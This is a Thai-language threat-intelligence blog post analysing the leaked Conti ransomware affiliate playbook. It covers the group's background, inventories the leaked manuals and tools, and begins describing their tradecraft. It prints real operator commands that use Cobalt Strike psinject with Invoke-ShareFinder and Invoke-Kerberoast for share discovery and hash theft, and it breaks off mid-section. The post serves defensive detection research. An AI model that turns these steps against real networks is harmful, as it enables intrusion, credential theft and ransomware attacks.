ในช่วงไม่กี่สัปดาห์ที่ผ่านมา หนึ่งในผู้ร่วมปฏิบัติการของกลุ่มมัลแวร์เรียกค่าไถ่ Conti ได้มีการนำคู่มือปฏิบัติการซึ่งจะถูกแจกจ่ายให้กับสมาชิกในกลุ่มมาเผยแพร่สู่สาธารณะ การปรากฎของข้อมูลชุดนี้ได้เผยให้เห็นถึงแนวทางในการเจาะระบบเพื่อให้สามารถบรรลุเป้าหมายในสร้างผลตอบแทนด้วยมัลแวร์เรียกค่าไถ่ได้ ข้อมูลชุดนี้ยังยืนยันและเปิดเผยให้เห็นถึงพฤติกรรมและเทคนิคในการเจาะระบบซึ่งบางส่วนยังไม่เคยปรากฎหรือถูกพูดถึงในรายงานการวิเคราะห์ปฏิบัติการของกลุ่ม Conti อีกด้วย

สำหรับเป้าหมายของเราในบล็อกนี้คือการวิเคราะห์และทำความเข้าใจข้อมูลที่ถูกปล่อยออกมาทั้งเพื่อใช้มันในการทำความเข้าใจแนวคิดของ Conti และใช้มันเพื่อทำความเข้าใจลักษณะและเทคนิคของกลุ่มมัลแวร์เรียกค่าไถ่อื่น ๆ ซึ่งจะนำไปสู่การค้นคว้าแนวทางในการระบุหาและตรวจจับการมีอยู่ของมัลแวร์เรียกค่าไถ่ที่มีประสิทธิภาพมากยิ่งขึ้น เพื่อให้สามารถทำความเข้าใจได้โดยง่าย ผมจะขอแบ่งส่วนของเนื้อหาในบล็อกนี้ออกเป็นหัวข้อตามรายการด้านล่างครับ

 • Background ประวัติของ Conti, ความเกี่ยวข้องกับ Trickbot และ Ryuk และลักษณะของการว่าจ้างผู้ปฏิบัติการแบบ affiliation program
 • Overview ชุดของข้อมูลที่เกี่ยวข้องกับปฏิบัติการของ Conti และความแตกต่างของข้อมูลในแต่ละชุด
 • Analysis การวิเคราะห์ไฟล์ที่ปรากฎในชุดข้อมูล รายละเอียดและคำอธิบายไฟล์
 • Findings ข้อสังเกตที่น่าสนใจจากข้อมูลที่ปรากฎในไฟล์โดยเชื่อมโยงกับพฤติกรรมของกลุ่ม Conti

1. Background

Conti เป็นสายพันธุ์ของมัลแวร์เรียกค่าไถ่และบริการมัลแวร์เรียกค่าไถ่แบบ Ransomware as a Service (RaaS) ที่เกี่ยวข้องอย่างแนบแน่นกับกลุ่มผู้แพร่กระจายมัลแวร์ Trickbot ซึ่งเป็นกลุ่มเดียวกับผู้ที่แพร่กระจายมัลแวร์เรียกค่าไถ่ Ryuk หลักฐานของความเกี่ยวข้องกันอย่างแนบแน่นนี้ปรากฎทั้งในลักษณะของการใช้โครงสร้างการแพร่กระจายของมัลแวร์ Trickbot ที่มีการแพร่กระจายในระบบทั่วโลกอยู่แล้วเพื่อเป็นช่องทางในการติดตั้งและแพร่กระจายมัลแวร์เรียกค่าไถ่ รวมไปถึงความเหมือนของโค้ดมัลแวร์เรียกค่าไถ่ Conti และโค้ดของมัลแวร์เรียกค่าไถ่ Ryuk

มัลแวร์เรียกค่าไถ่ Conti ใช้แนวทางในการเรียกค่าไถ่แบบ double extortion โดยจะมีทั้งการเข้ารหัสข้อมูลในระบบที่ยึดครองเพื่อสร้างเงื่อนไขในการเรียกค่าไถ่ รวมไปถึงมีการนำไฟล์ข้อมูลออกเป็นเงื่อนไขในการข่มขู่เงื่อนไขที่สอง Conti ยังมีการเผยแพร่รายชื่อของเหยื่อบนเว็บไซต์ของกลุ่มเพื่อกดดันให้เหยื่อจ่ายค่าไถ่ด้วย

ในฉากหลังของปฏิบัติการของ Conti การแพร่กระจายและสร้างรายได้จากมัลแวร์เรียกค่าไถ่ถูกจัดการในลักษณะของ affiliation program หรืออาจเรียกได้ว่าการแบ่งส่วนผลประโยชน์ตามหน้าที่ เช่นเดียวกับโมเดล Ransomware as a Service ที่ผู้ที่ต้องการแพร่กระจายมัลแวร์เรียกค่าไถ่สามารถเช่าซื้อโค้ดของมัลแวร์เรียกค่าไถ่ที่พร้อมใช้งานโดยยอมโดนหักผลประโยชน์จากค่าไถ่ที่จะถูกจ่ายให้กับผู้พัฒนา ใน affiliation program ผู้ที่มีส่วนร่วมกับปฏิบัติการทั้งในหน้าที่ของการเจาะระบบ, การพัฒนามัลแวร์, เป็น call center คอยตอบเหยื่อที่ต้องการความช่วยเหลือในกระบวนการโอนเงิน รวมไปถึงให้เช่าเครือข่ายของมัลแวร์เพื่อเป็นช่องทางในการแพร่กระจายต่างจะได้รับเงินตามเปอร์เซ็นต์การมีส่วนร่วม

เราเคยพูดถึงโมเดล “บริษัทของอาชญากรไซเบอร์” ไปแล้วในกรณีศึกษาของกลุ่ม FIN7 ซึ่งสามารถอ่านเพิ่มเติมได้ที่นี่

การหาแนวร่วมเพื่อเข้ามาเป็นพนักงานในปฏิบัติการของมัลแวร์เรียกค่าไถ่มักปรากฎในลักษณะเดียวกับการประกาศรับสมัครงานในเว็บบอร์ดของเหล่าอาชญากรไซเบอร์ ในกรณีของ Conti การประกาศมีการให้รายละเอียดเพื่อจูงใจด้วยผลประโยชน์ดังนี้

 • การันตีรายได้ต่อเดือน เดือนละ 1,500 ดอลลาร์สหรัฐฯ หรือประมาณ 50,000 บาทเป็นขั้นต่ำ
 • รายได้ต่อเดือนจะเพิ่มตามจำนวนเหยื่อโดยแบ่งตามเปอร์เซ็นต์การมีส่วนร่วม โดยจะถูกโอนเป็นบิทคอยน์ไปยังผู้ที่เกี่ยวข้องกับปฏิบัติการ
 • มีการจ่ายในลักษณะของ paid vacation หรือการลาพักร้อนแบบไม่ถูกหักเงินเดือนตามกฎหมาย
 • ทำงานแบบรีโมต 5 วันต่อสัปดาห์ จันทร์-ศุกร์ในช่วงเวลา 15:00 นาฬิกาถึง 1:00 นาฬิกา ไม่ระบุ time zone ชัดเจน
 • มีคู่มือให้กับพนักงานใหม่ ทั้งในลักษณะของคู่มือในการโจมตีระบบ เครื่องมือสำหรับโจมตีระบบ และวีดิโอสอนการโจมตีระบบ

@herrcore จาก Open Analysis Lab ได้ให้ความเห็นจากการวิเคราะห์ไฟล์ตัวอย่างของมัลแวร์เรียกค่าไถ่ Conti เอาไว้ว่า สำหรับในกรณีของผู้ปฏิบัติการที่ทำหน้าที่ในการเจาะระบบเพื่อเอาโปรแกรมของมัลแวร์เรียกค่าไถ่ไปเริ่มการทำงานนั้น ผู้ปฏิบัติการอาจจะได้รับคำสั่งให้เข้าถึงเป้าหมายผ่าน Cobalt Strike เพื่อดำเนินการทันที ซึ่งอาจหมายถึงว่าผู้ควบคุมมัลแวร์อย่าง Trickbot หรือ BazarLoader ที่ Conti ใช้เป็นช่องทางในการแพร่กระจายอาจมีการเลือกเป้าหมายเอาไว้แล้ว จากนั้นจึงติดตั้ง BEACON ของ Cobalt Strike และโอนถ่ายการเข้าถึงระบบเป้าหมายนั้นไปให้กับผู้ปฏิบัติการต่อ

2. Overview

ข้อมูลหรือคู่มือปฏิบัติการของ Conti นั้นถูกระบุว่ามีทั้งหมด 2 ชุด อย่างไรก็ตามจากการตรวจสอบและติดตามข่าวสาร ข่าวที่เกี่ยวข้องกับการปล่อยข้อมูลกลับบ่งชี้ว่าข้อมูลมีทั้งหมด 3 ชุดที่แตกต่างกัน โดยในขณะนี้นั้นมีเพียงข้อมูลจำนวน 2 ชุดที่ถูกปล่อยออกสู่สาธารณะ ส่วนอีกชุดหนึ่งนั้นยังไม่ปรากฎออกมาในสื่อใด ๆ เพื่อให้ง่ายต่อการระบุถึง ผมจะขอแยกชุดข้อมูลทั้ง 3 ชุดนี้ออกตามรายละเอียดดังนี้ครับ

 • ชุด ManualsAndSoftware ข้อมูลชุดนี้จะอยู่ในลักษณะของไฟล์บีบอัดชื่อ “Manuals for hard worker and software.rar” บางสำเนาของข้อมูลชุดนี้ที่ถูกเผยแพร่ออกมา เช่น สำเนาของกลุ่ม VX Undergraound จะไม่มีไฟล์ CobaltStrike MANUAL_V2.docx อยู่ภายใน รายการของโครงสร้างไฟล์ในข้อมูลชุดนี้สามารถดูได้จาก 1_ManualsAndSoftware.txt

 • ชุด ContiTraining เป็นชุดข้อมูลที่ซึ่งคาดว่าถูกใช้เพื่อเป็นคู่มือและแหล่งข้อมูลในการฝึกสอนผู้ปฏิบัติการของ Conti ภายในไฟล์ประกอบไปด้วยไฟล์วีดิโอจากคอร์สจาก Pentester Academy, วีดิโอของ Cobalt Strike และวีดิโอที่เกี่ยวข้องกับการใช้งาน Metasploit เป็นต้น ไม่ปรากฎไฟล์หรือข้อมูลที่เกี่ยวข้องกับกลุ่ม Conti โดยตรง รายการของโครงสร้างไฟล์ในข้อมูลชุดนี้สามารถดูได้จาก 2_ContiTraining.txt

 • ชุด Private รายการของข้อมูลชุดนี้ปรากฎในเว็บบอร์ด xss.is โดยบุคคลซึ่งอ้างว่าเป็นผู้ปล่อยข้อมูลต้นฉบับ ผู้ปล่อยข้อมูลมีการระบุถึงความตั้งใจที่จะไม่ปล่อยข้อมูลชุดนี้ออกสู่สาธารณะ หากเรียงตามลำดับเวลา รายการของข้อมูลชุดนี้ปรากฎเป็นอันดับที่ 2 หลังจากชุด ManualsAndSoftware ทำให้ถูกเข้าใจว่าเป็นชุดข้อมูลที่ 2 อย่างไรก็ตามหลังจากมีการปล่อยข้อมูลในชุด ContiTraining ออกมานั้น ไฟล์หลายไฟล์ซึ่งปรากฎในรูปด้านล่างกลับไม่ปรากฎในข้อมูลชุด ContiTraining ซึ่งถูกระบุว่าเป็นข้อมูลชุดที่ 2 แทน อาทิ ไฟล์สำคัญอย่าง “Binary Conti Ransomware” หรือไฟล์ที่คาดว่าเป็นโค้ดมาโครที่ถูกใช้โดย Conti ด้วยความแตกต่างกันนี้ ข้อมูลตามรายการด้านล่างจึงถูกกำหนดเป็นข้อมูลชุดที่ 3 แทน ณ ขณะนี้

การวิเคราะห์ข้อมูลในบทความนี้จะพุ่งเป้าไปที่ชุดข้อมูลที่ผู้วิเคราะห์ครอบครองอยู่ คือข้อมูลในชุด ManualsAndSoftware และข้อมูลชุด ContiTraining เท่านั้นครับ

3. Analysis

รายละเอียดในส่วนนี้มีเป้าหมายในการอธิบายรายละเอียดของไฟล์ที่ปรากฎในชุดข้อมูลทั้ง 2 รวมไปถึงข้อมูลภายในไฟล์ จุดประสงค์ของข้อมูลภายในไฟล์และรายละเอียดอื่น ๆ ที่จะช่วยให้ผู้อ่านเข้าใจเหตุผลการมีอยู่ของไฟล์ทั้งหมดได้มากขึ้นครับ

เพื่อให้สามารถทำความเข้าใจจุดประสงค์ของไฟล์ได้โดยง่าย รายการของไฟล์จะถูกอธิบายด้วยรูปแบบของ “ชื่อไฟล์ดั้งเดิม (ชื่อไฟล์ที่ถูกแปลเป็นภาษาอังกฤษ): รายละเอียดของไฟล์” โดยในกรณีที่ไฟล์มีชื่อเป็นภาษาอังกฤษอยู่แล้ว ไฟล์ในรายการดังกล่าวจะไม่มีข้อมูลในส่วน “ชื่อไฟล์ที่ถูกแปลเป็นภาษาอังกฤษ” ครับ

3.1 ManualsAndSoftware

File Name Description
3 # AV.7z สคริปต์และโปรแกรมที่สามารถใช้เพื่อปิดการทำงานหรือถอนการติดตั้งโปรแกรมป้องกันมัลแวร์ โปรแกรมป้องกันมัลแวร์ที่จะได้รับผลกระทบจากเครื่องมือในชุดไฟล์นี้ ได้แก่ Sophos, Trend Micro และ BitDefender รวมไปถึงโปรแกรมที่ช่วยในการปิดโปรแกรมมัลแวร์อรรถประโยชน์อย่าง PowerTool, PCHunter และ GMER ด้วย
ad_users.txt คู่มือและคำสั่งสำหรับการรวบรวมรายการบัญชีผู้ใช้งานในสภาพแวดล้อม Active Directory ด้วย PowerView และ Invoke-UserHunter
CS4.3_Clean ahsh4veaQu .7z ไฟล์โปรแกรม Cobalt Strike รุ่น 4.3
DAMP NTDS.txt คู่มือและคำสั่งสำหรับการนำไฟล์ NTDS ออกจากระบบเป้าหมายด้วยฟีเจอร์ WMIC และ VSS พร้อมคำแนะนำในการบีบอัดและส่งออกไฟล์
domains.txt รายการชื่อระบบ
enhancement-chain.7z ปลั๊กอินอรรถประโยชน์สำหรับ Cobalt Strike คาดว่าเกิดจากการรวบรวมปลั๊กอินแบบโอเพนซอร์สที่มีอยู่จากหลายแหล่ง
Kerber-ATTACK.rar สคริปต์ Invoke-Kerberoast พร้อมกับคู่มือและตัวอย่างในการใช้งานเพื่อสร้างการโจมตีด้วยเทคนิค Kerberoast
NetScan.txt คู่มือสำหรับการใช้โปรแกรม NetScan ในการสแกนเครือข่าย
p.bat สคริปต์ที่นำเข้าข้อมูลจากไฟล์ domains.txt จากนั้นทำการเรียกใช้คำสั่ง ping กับทุกระบบ ผลลัพธ์จะถูกเก็บลงในไฟล์ res.txt
PENTEST SQL.txt ปรากฎลิงค์ไปยังหน้า Wiki ของโครงการ NetSPI/PowerUpSQL
ProxifierPE.zip โปรแกรม Proxifier PE
RDP NGROK.txt คู่มือการใช้ ngrok ในการสร้าง tunnel กับฟีเจอร์ Remote Desktop ของระบบที่ยึดครอง เพื่อให้ผู้ปฏิบัติการสามารถเข้าควบคุมเครื่องเป้าหมายได้ผ่านโดเมนของ ngrok
RMM_Client.exe โปรแกรม remote IT management จากบริษัท Splashtop
Routerscan.7z โปรแกรม RouterScan
RouterScan.txt คู่มือการใช้โปรแกรม RouterScan ในการสแกนเครือข่ายและสร้างการโจมตีแบบ brute force ด้วย wordlist
SQL DAMP.txt คู่มือและตัวอย่างของการนำข้อมูลออกจากระบบ MSSQL
Аллиасы для мсф.rar (Alliases for msf.rar) ลิสต์คำสั่งย่อของโปรแกรม Metasploit Framework
Анонимность для параноиков.txt (Anonymity for the paranoid.txt) คู่มือสำหรับเพิ่มความเป็นส่วนตัวของผู้ปฏิบัติการ ประกอบไปด้วยคำแนะนำภายใต้แนวคิดของการกลืนไปกับคนหมู่มากแทนการสร้างการป้องกันและตั้งค่าให้ตัวเองโดดเด่นมาจากผู้อื่น เช่น การปิดฟีเจอร์ WebRTC และ JavaScript ของเบราว์เซอร์ รวมไปถึงคำแนะนำให้เลือกใช้ OS อย่าง Debian แทน Kali
ДАМП LSASS.txt (Dump LSASS.txt) คู่มือและตัวอย่างคำสั่งในการดึงสร้างไฟล์ memory dump ของโปรเซส lsass.exe ด้วยการเรียกใช้ฟังก์ชัน MiniDump ใน Comsvcs.dll (อ้างอิง LOLBAS) รวมไปถึงเทคนิคทั่วไปอย่างการใช้คำสั่ง logonpasswords ของโปรแกรม mimikatz
Если необходимо отсканить всю сетку одним листом.txt (If you need to scan the entire grid in one sheet..txt) คู่มือและตัวอย่างคำสั่งของโปรแกรม AdFind
Закреп AnyDesk.txt (Anchored AnyDesk.txt) สคริปต์ PowerShell สำหรับดาวโหลดและติดตั้งโปรแกรม AnyDesk
Заменяем sorted адфиндера.txt (We replace sorted adfinder.txt) คู่มือและตัวอย่างคำสั่งในการใช้ฟีเจอร์ Task Scheduler ผ่าน schtasks.exe เพื่อให้สามารถเอ็กซีคิวต์โปรแกรมสำหรับเก็บข้อมูลระบบโดยอัตโนมัติตามระยะเวลาที่ต้องการได้
КАК ДЕЛАТЬ ПИНГ (СЕТИ).txt (HOW TO PING (NETWORK) .txt) คู่มือในการใช้สคริปต์ p.bat ร่วมกับ domains.txt
КАК ДЕЛАТЬ СОРТЕД СОБРАННОГО АД!!!!.txt (HOW TO MAKE SORT OF COLLECTED HELL !!!!. Txt) คู่มือและตัวอย่างคำสั่งในการโอนถ่ายไฟล์ออกผ่านโปรโตคอล FTP ด้วยโปรแกรม FileZilla และการใช้ Tor เพื่อให้การเชื่อมต่อเกิดขึ้นผ่านพร็อกซีแบบ SOCKS
КАК И КАКУЮ ИНФУ КАЧАТЬ.txt (HOW AND WHAT INFO TO DOWNLOAD.txt) คู่มือและตัวอย่างของการสร้างรายการไฟล์ที่มีระบบด้วย Invoke-ShareFinder จากนั้นใช้โปรแกรม rclone เพื่อรวบรวมไฟล์เพื่อส่งออก
КАК ПРЫГАТЬ ПО СЕССИЯМ С ПОМОЩЬЮ ПЕЙЛОАД.txt (HOW TO JUMP SESSIONS USING PAYLOAD.txt) คู่มือและตัวอย่างคำสั่งในการใช้ฟีเจอร์ Task Scheduler ผ่าน schtasks.exe เพื่อให้สามารถเอ็กซีคิวต์โปรแกรมสำหรับเก็บข้อมูลระบบโดยอัตโนมัติตามระยะเวลาที่ต้องการได้
Личная безопасность.txt (Personal Safety.txt) คู่มือสำหรับเพิ่มความปลอดภัยและความเป็นส่วนตัวให้กับผู้ปฏิบัติการ ประกอบด้วยคำแนะนำให้ผู้ปฏิบัติการดำเนินปฏิบัติการใน virtual machine และใช้โปรแกรม VeraCrypt ในการเข้ารหัสดิสก์ของ virtual machine ด้วย
Мануал робота с AD DC.txt (Manual robot with AD DC.txt) ไฟล์ซึ่งจัดเก็บ log จากโปรแกรม Cobalt Strike แสดงตัวอย่างของการเรียกใช้คำสั่งในปฏิบัติการและผลลัพธ์ที่เกิดจากคำสั่ง คาดว่าถูกใช้เป็นตัวอย่างประกอบเพื่อให้เห็นภาพทั้งหมดของปฏิบัติการ
МАНУАЛ.txt (MANUAL.txt) คู่มือแนะนำเทคนิคในกลุ่ม post exploitation ผ่าน Cobalt Strike ซึ่งรวมไปถึงการรวบรวมข้อมูลของระบบ, การใช้ชุดสคริปต์ PowerView ในการช่วยรวบรวม, การระบุหาข้อมูลสำหรับยืนยันตัวตนในระบบที่ยืดครอง และการปิดฟีเจอร์ป้องกันมัลแวร์ที่มาพร้อมกับระบบปฏิบัติการ
Меняем RDP порт.txt (Change RDP port.txt) สคริปต์ PowerShell สำหรับการเปลี่ยนพอร์ตของเซอร์วิส Remote Desktop
ОТКЛЮЧЕНИЕ ДЕФЕНДЕРА ВРУЧНУЮ.txt (DISABLING THE DEFENDER MANUALLY.txt) คู่มือและขั้นตอนในการปิดการทำงานเซอร์วิส Windows Defender ผ่านการตั้งค่าใน Group policy
параметр запуска локера на линукс версиях.txt (locker launch parameter on linux versions.txt) รายการพารามิเตอร์ของโปรแกรมมัลแวร์เรียกค่าไถ่ Conti ในรุ่นที่รองรับการเข้ารหัสระบบปฏิบัติการลินุกซ์และระบบ ESXi
ПЕРВОНАЧАЛЬНЫЕ ДЕЙСТВИЯ.txt (INITIAL STEPS.txt) คู่มือแนะนำเทคนิคในกลุ่ม post exploitation ประกอบไปด้วยการโจมตีด้วยเทคนิค Kerberoast, การใช้คำสั่ง hashdump ของโปรแกรม Cobalt Strike หรือ logonpasswords ของ mimikatz ในการเข้าถึงข้อมูลสำหรับยืนยันตัวตน, การโจมตีด้วยเทคนิค Pass the Hash และพยายามยกระดับสิทธิ์เป็นระบบ, การรวบรวมรายไฟล์และการ lateral movement ผ่านโปรโตคอล SMB โดยการใช้ Metasploit Framework ร่วมกับรหัสผ่านหรือแฮชของรหัสผ่านของบัญชีผู้ใช้งาน
по отключению дефендера.txt (to disable defender.txt) คู่มือการปิดเซอร์วิส mspeng ของ Windows Defender ด้วยโปรแกรม GMER
ПОВИЩЕНИЯ ПРИВИЛЕГИЙ.txt (INCREASE PRIVILEGES.txt) เก็บลิงค์ไปยังเว็บไซต์ deepl.com และโครงการ S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
поднятие прав (дефолт).txt (elevation of rights (default) .txt) คู่มือการใช้คำสั่ง svc-exe และ uac-token -dubl ของ Cobalt Strike ในการช่วยยกระดับสิทธิ์
Получение доступа к серверу с бекапами Shadow Protect SPX (StorageCraft).txt (Gaining access to the server with backups Shadow Protect SPX (StorageCraft) .txt) คู่มือการเข้าถึงระบบที่ใช้งานซอฟต์แวร์ Shadow Protect SPX (StorageCraft) รายละเอียดระบุเพียงแต่การเข้าถึงผ่านฟีเจอร์ Remote Desktop ไม่มีการระบุถึงรายละเอียดที่เกี่ยวข้องกับช่องโหว่ของซอฟต์แวร์
ПРОСТАВЛЕНИЕ.txt (SPACE.txt) คู่มือแนะนำการใช้โปรแกรม PsExec ในการเอ็กซีคิวต์คำสั่งและเก็บข้อมูลในระบบอื่น ๆ
Рабочая станция на работу через Tor сетїь.txt (Workstation to work through the Tor network.txt) ประกอบด้วยคำแนะนำให้ใช้ระบบ Whonix และให้ปฏิบัติตามคำแนะนำที่ปรากฎใน https://defcon.ru/penetration-testing/405/ เพื่อความปลอดภัย
Рабочий скрипт создания VPS сервера для тестирования на проникноваение от A до Z.txt (Working script for creating a VPS server for penetration testing from A to Z.txt) คู่มือการตั้งค่า virtual private server เพื่อการทดสอบเจาะระบบ อ้างอิงไปยังลิงค์ในเว็บบอร์ด xss.is ที่มีข้อมูลโดยละเอียดปรากฎอยู่
рклон.zip (rclone.zip) ไฟล์โปรแกรม rclone
Сайт создание батникоd.txt (Website creation batnikod.txt) คู่มือในการใช้เว็บไซต์ online code editor
Скрипт для sorted .rar (Script for sorted .rar) สคริปต์แบบ shell script สำหรับรวบรวมข้อมูลรายชื่อผู้ใช้งานและระบบที่มีการเชื่อมต่อ
СМБ АВТОБРУТ.txt (SMB AUTOBRUT.txt) คู่มือและตัวอย่างคำสั่งในการสร้างการโจมตีแบบ brute force ผ่านโปรโตคอล SMB ด้วย Invoke-SMBAutoBrute จาก Cobalt Strike
СНЯТИЕ-AD.rar (REMOVAL-AD.rar) โปรแกรม AdFind และสคริปต์สำหรับการเรียกใช้โปรแกรม AdFind เพื่อรวบรวมข้อมูล
Список ТГ форумов, много интересного.txt (List of TG forums, many interesting things.txt) รายการ Telegram channel
Установка метасплойт на впс.txt (Installing metasploit on vps.txt) คู่มือการติดตั้งโปรแกรม Metasploit Framework
хантинг админов, прошу ознакомиться, очень полезно!!.txt (hunting admins, please read, very useful !!. txt) คู่มือและตัวอย่างคำสั่งเพื่อรวบรวมข้อมูลผู้ใช้งานใน Active Directory ผ่าน Cobalt Strike
Эксплуатация CVE-2020-1472 Zerologon в Cobalt Strike.txt (Exploiting CVE-2020-1472 Zerologon at Cobalt Strike.txt) คู่มือแสดงขั้นตอนการโจมตีช่องโหว่ ZeroLogon ผ่าน Cobalt Strike
это установка армитажа. ставится поверх Metasploit (this is an armitage installation. put on top of Metasploit) สคริปต์สำหรับติดตั้งโปรแกรม Armitage
CobaltStrike MANUAL_V2 .docx (Cobalt strike MANUALS_V2 Active Directory) ขั้นตอนการใช้โปรแกรม Cobalt Strike ในลักษณะ post exploitation ตั้งแต่การรวบรวมข้อมูลของระบบและผู้ใช้งาน, การยกระดับสิทธิ์, การเข้าถึงระบบอื่น ๆ และการรวบรวมไฟล์เพื่อนำออก

3.2 ContiTraining

File Name Description
1. Кряк 2019.rar (1. Crack 2012.rar) คู่มือการทำ reverse engineering, ไฟล์โปรแกรมสำหรับการทดสอบ, ตัวอย่างโปรแกรมที่ถูกคอมไพล์แล้วและการใช้โปรแกรม IDA Pro จากเว็บไซต์ exelab
2. Метасплоит US.rar (2. Metasploit US.rar) วีดิโอและข้อมูลประกอบจากคอร์ส SecurityTube Metasploit Framework Expert (SMFE)
3. Метасплоит RU.zip (3. Metasploit RU.zip) วีดิโอและข้อมูลประกอบจากคอร์ส Этичный хакинг с Metasploit для начинающих
4. Network Pentesting.rar วีดิโอและข้อมูลประจากคอร์ส Network Pentesting โดย PentesterAcademy
5. Cobalt Strike.rar วีดิโอจากเพลย์ลิสต์ Red Team Operations with Cobalt Strike โดย Raphael Mudge และวีดิโอ CVE-2020-1472 Zerologon as a Beacon Object File
6. Powershell for Pentesters+.rar วีดิโอและข้อมูลประกอบจากคอร์ส Powershell for Pentesters โดย PentesterAcademy
7. Windows Red Team Lab+.rar วีดิโอและข้อมูลประกอบจากคอร์ส Windows Red Team Lab โดย PentesterAcademy
8. WMI Attacks and Defense +.rar วีดิโอและข้อมูลประกอบจากคอร์ส WMI Attacks and Defense โดย PentesterAcademy
9. Abusing SQL Server Trusts in a Windows Domain+.rar วีดิโอและข้อมูลประกอบจากคอร์ส Abusing SQL Server Trusts in a Windows Domain โดย PentesterAcademy
10. Attacking and Defending Active Directory+.rar วีดิโอและข้อมูลประกอบจากคอร์ส Attacking and Defending Active Directory โดย PentesterAcademy
GCB.zip วีดิโอและข้อมูลประกอบจาก Global Central Bank: An Enterprise Cyber Range โดย PentesterAcademy
GeekBrayns Реверс-инжиниринг.rar (GeekBrayns Reverse-engineering.rar) วีดิโอคอร์ส reverse engineering ภาษารัสเซียโดย Sergey Sychev

4. Findings

เนื้อหาในส่วนต่อไปนี้จะเป็นการพูดถึงข้อสังเกตทีน่าสนใจซึ่งพบในชุดข้อมูลที่ทำการตรวจสอบ ข้อสังเกตเหล่านี้สะท้อนพฤติกรรมของกลุ่ม Conti ตั้งแต่การเข้าถึงระบบเป้าหมายไปจนถึงการบรรลุจุดประสงค์ในการโจมตีและการวิเคราะห์เพิ่มเติมในประเด็นที่สนใจ

4.1 Tradecraft

ลำดับขั้นตอนในการโจมตี ยึดครองและเคลื่อนไหวภายในระบบของ Conti ถูกแบ่งออกเป็น 4 ขั้นตอนใหญ่โดยมีเพียง 3 ขั้นตอนที่รายละเอียดประกอบ โดยภายในขั้นตอนใหญ่แต่ละรายการจะประกอบไปด้วยขั้นตอนย่อยอีกหลายรายการ ผมจะหยิบบางส่วนของขั้นตอนย่อยเหล่านี้ขึ้นมาอธิบายและสรุปประกอบเพื่อเพิ่มรายละเอียดให้กับขั้นตอนใหญ่เหล่านี้ครับ

ขั้นตอนใหญ่ในการโจมตีของ Conti ทั้งหมด 4 รายการมีดังนี้

 1. การยกระดับสิทธิ์และเก็บข้อมูลของระบบ
 2. อัปโหลดข้อมูลของเหยื่อไปยังระบบภายนอก
 3. เริ่มการเอ็กซีคิวต์มัลแวร์เรียกค่าไถ่เพื่อเข้ารหัสระบบเป้าหมาย
 4. อื่น ๆ (ไม่มีข้อมูล)

4.1.1 Increasing Privileges and Collection Information

เนื่องจากวิธีการเข้าถึงโดยทั่วไปเพื่อติดตั้งและใช้งานมัลแวร์เรียกค่าไถ่ Conti นั้นมักเกิดขึ้นผ่านมัลแวร์ Trickbot หรือมัลแวร์ BazarLoader โดยจะมีการใช้โปรแกรม Cobalt Strike ในการเข้าควบคุมระบบเป้าหมาย เราขออนุมานว่าผู้ปฏิบัติการจะใช้โปรแกรม Cobalt Strike ในการควบคุมและสั่งการระบบในขั้นตอนที่จะเกิดขึ้นต่อจากนี้ไป

การเก็บข้อมูลของเป้าหมายเกิดขึ้นใน 2 ลักษณะ คือ การเก็บข้อมูลที่ปรากฎในอินเตอร์เน็ตและการเก็บข้อมูลในระบบเป้าหมาย

ในการเก็บข้อมูลที่ปรากฎในอินเตอร์เน็ตนั้น ผู้ปฏิบัติการจะได้ทำการหาข้อมูลรายได้ของเหยื่อโดยการใช้คำค้นหาอย่าง “ชื่อเว็บไซต์” หรือ “ชื่อบริษัท” ร่วมกับคำว่า revenue กับบริการค้นหาออนไลน์ต่าง ๆ

ในส่วนของการค้นหาข้อมูลภายในระบบ ผู้ปฏิบัติการจะทำการค้นหาชื่อบัญชีผู้ใช้ปัจจุบัน, กลุ่มของผู้ใช้งาน, รายการบัญชีผู้ใช้งานที่มีสิทธิ์เป็นผู้ดูแลระบบ, รายการบัญชีผู้ใช้งานในกลุ่ม domain admins และ enterprise admins, ข้อมูลของระบบ domain controller และจำนวนระบบในโดเมน การเก็บข้อมูลเกิดขึ้นผ่าน Cobalt Strike โดยใช้คำสั่ง net

หลังจากนั้นผู้ปฏิบัติการจะทำการเก็บข้อมูลของการใช้ฟีเจอร์ File sharing ผลลัพธ์ในส่วนนี้จะได้รายการของไฟล์ที่สามารถเข้าถึงได้ผ่านฟีเจอร์ด้วย เป้าหมายในขั้นตอนนี้คือการหา ADMIN$ และพาธในฟีเจอร์ File sharing ที่บัญชีผู้ใช้งานปัจจุบันสามารถเข้าถึงได้ การเก็บข้อมูลจะมีการใช้สคริปต์ Invoke-ShareFinder.ps1 ร่วมกับคำสั่ง powershell-import และ psinject ของ Cobalt Strike

คำสั่ง psinject เป็นฟีเจอร์ของ Cobalt Strike ในการแทรก DLL ของ PowerShell แบบ unmanaged ไปไว้ในโปรเซสอื่นเพื่อให้สามารถเรียกใช้คำสั่ง PowerShell ในโปรเซสดังกล่าวได้ Conti ใช้ฟีเจอร์บ่อยครั้งเมื่อมีการใช้งานสคริปต์ PowerShell ในปฏิบัติการ ตัวอย่างการเรียกใช้ในกรณีของ Conti มีตามรายละเอียดด้านล่าง ผู้ปฏิบัติการจะมองพาธของข้อมูลที่เกี่ยวข้องกับธุรกิจของเหยื่อเพื่อนำข้อมูลออกในขั้นตอนต่อไป

powershell-import /home/user/work/Invoke-ShareFinder.ps1
psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out-File -Encoding ascii C:\ProgramData\sh.txt
psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt

ต่อมาผู้ปฏิบัติการจะเริ่มทำการเก็บข้อมูลสำหรับใช้ในการยืนยันตัวตนเพื่อยกระดับสิทธิ์ แนวทางในขั้นตอนนี้มีหลากหลายตามรายการดังนี้

 • ใช้เทคนิค Kerberoast กระบวนนี้มีทางเลือกของเครื่องมืออยู่ 2 แบบ คือการใช้สคริปต์ Invoke-Kerberoast.ps1 ผ่าน powershell-import และ psinject หรือการใช้ Rubeus ผ่านคำสั่ง execute-assembly จากนั้นนำค่าแฮชตามไฟล์ที่ระบุในพารามิเตอร์ Out-File หรือ outfile ออกมาเพื่อทำการแคร็กในภายหลัง
// Method 1
powershell-import /home/user/work/Invoke-Kerberoast.ps1
psinject 4728 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:\ProgramData\pshashes.txt -append -force -Encoding UTF8

// Method 2
